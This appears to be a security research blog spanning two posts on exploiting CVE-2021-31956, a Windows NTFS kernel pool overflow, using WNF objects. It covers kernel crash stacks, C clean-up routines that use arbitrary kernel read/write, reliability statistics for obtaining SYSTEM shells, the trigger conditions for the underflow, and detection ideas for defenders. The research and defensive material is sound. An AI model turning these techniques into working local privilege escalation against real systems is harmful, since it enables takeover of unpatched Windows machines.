05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee

Although we could restore this using the WNF relative read/write, as we have arbitrary read and write using the APIs, we can implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE object address.

Visually this looks as follows:

Some example code for this is:

/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    return (QWORD*)((QWORD*)i - 2);
}

Then once we have obtained our _WNF_NAME_INSTANCE we can then restore the original StateData pointer.

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted many RunRef from _WNF_NAME_INSTANCE‘s in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:

1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see there is a member TemporaryNamesListHead which is a linked list of the addresses of the TemporaryNamesListHead within the _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I had the need to obtain NTOSKRNL base address to speed up some examinations and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, then the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14

Exploit Testing and Statistics

As there are some elements of instability and non-deterministic elements of this exploit, then an exploit testing framework was developed to determine the effectiveness across multiple runs and on multiple different supported platforms and by varying the exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with potentially other third party drivers etc installed and a more noisy kernel pool, it gives some indication of this approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All these are measured over 100 iterations of the exploit (over 5 runs) for a timeout duration of 15 seconds (i.e. a BSOD did not occur within 15 seconds of an execution of the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the max number of overflow attempts. 32 was chosen a semi-arbitrary value based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned by groups of 32 blocks.

BSODs on exec – Number of times the exploit BSOD the box on execution.

Unmapped Read – Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) – included in the BSOD on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 85 82 76 75 75 78
Total LFH writes 708 726 707 678 624 688
Avg LFH writes 8 8 9 9 8 8
Failed after 32 1 3 2 1 1 2
BSODs on exec 14 15 22 24 24 20
Unmapped Read 4 5 8 6 10 7

Spray size 6000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 80 78 84 79 81
Total LFH writes 674 643 696 762 706 696
Avg LFH writes 8 8 9 9 8 8
Failed after 32 2 4 3 3 4 3
BSODs on exec 14 16 19 13 17 16
Unmapped Read 2 4 4 5 4 4

Spray size 10000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 85 87 85 86 85
Total LFH writes 805 714 761 688 694 732
Avg LFG writes 9 8 8 8 8 8
Failed after 32 3 5 3 3 3 3
BSODs on exec 13 10 10 12 11 11
Unmapped Read 1 0 1 1 0 1

Spray size 20000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 89 90 94 90 90 91
Total LFH writes 624 763 657 762 650 691
Avg LFG writes 7 8 7 8 7 7
Failed after 32 3 2 1 2 2 2
BSODs on exec 8 8 5 8 8 7
Unmapped Read 0 0 0 0 1 0

From this was can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to the page not being mapped) and thus reducing the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that performing the token stealing method there are more kernel reads/writes and a longer time duration between reverting PreviousMode.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
PRIV shells 94 92 93 92 89 92
Total LFH writes 939 825 825 788 724 820
Avg LFG writes 9 8 8 8 8 8
Failed after 32 2 2 1 2 0 1
BSODs on exec 4 6 6 6 11 6
Unmapped Read 0 1 1 2 2 1

Therefore, there is only negligible difference these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well firstly there is a patch out for this vulnerability since the 8th of June 2021. If your reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this and in general detecting memory corruption exploits within the wild. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation technique detection (token stealing etc) which have been covered in many online articles. As I never had access to the in the wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should allow security researchers a greater understanding in this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:

As this vulnerability can be exploited a low integrity (and thus from a sandbox), then the detection mechanisms would vary based on if an attacker had local code execution or chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser render process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome while loading a new tab and web page did not trigger either of the events too. I didn’t explore too deeply if there were any render operations which could trigger this non-maliciously but provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.

In the case of this specific vulnerability when being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur which could act a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution. Once kernel code execution has been gained or SYSTEM, they may just disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more succesful and less likely to cause instability on the target system than a simple POC. However, we can only get about 90%~ success rate due to the techniques used. This seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and detection of memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

15 July 2021 at 12:07

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes many versions of Windows being affected and in-the-wild exploitation of the issue being used in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing a modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Framework (WNF) used by the in-the-wild attackers to enable novel exploit primitives. This lead to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.

Putting some example numbers into this, lets assume the following: There are two extended attributes within the extended attributes for the file.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 < out_buf_length - 0, data would be copied into the buffer. We will use 30 for this example.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values :

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario when we have the following setup if we could have the out_buf_length of 18.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

First iteration the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 5 + 47 + 9
ea_block_size = 137

In the resulting check will be:

ea_block_size <= out_buf_length - padding

137 <= 0 - 2

And at this point we have underflowed the check and 137 bytes will be copied off the end of the buffer, corrupting the adjacent memory.

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers for NtfsCommonQueryEa we can see that we can see that NtQueryEaFile system call path triggers this code path to reach the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled size allocation in the kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described as above.

In order to do trigger the underflow, we need to set our output buffer size to be length of the first Ea Block.

Providing we are padding the allocation, the second Ea Block will be written out of bounds of the buffer when the second Ea Block is queried.

The interesting things from this vulnerability from an attacker perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is can this be exploited reliably in the presence of modern kernel pool mitigations and is this a “good” memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the space within the buffer between 0-18.

There is then the padding length of 2, with the second extended attribute starting at 20 offset.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block is the size in which we want to allocate our vulnerable buffer (minus the pool header). The second extended attribute block is set to the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed in NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow copy of an attacker-controlled size.

So in summary, once the extended attributes have been written to the file using NtSetEaFile. It is then necessary to trigger the vulnerable code path to act on them by setting the outbuffer size to be exactly the same size as our first extended attribute using NtQueryEaFile.

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows, however, not very much on recent versions of Windows 10 (19H1 and up). There has been significant changes with bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this and proposing some initial techniques. Without this paper being published already, exploitation of this issue would have been significantly harder.

Firstly the important thing to understand is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We determine what heap structure in which the chunk lives on from the four “backends”:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile parameter Length value above of 0x12 to end up with a vulnerable chunk of sized 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation fitting being below 0x200.

We can step through the corruption of the adjacent chunk occurring by settings a conditional breakpoint on the following location:

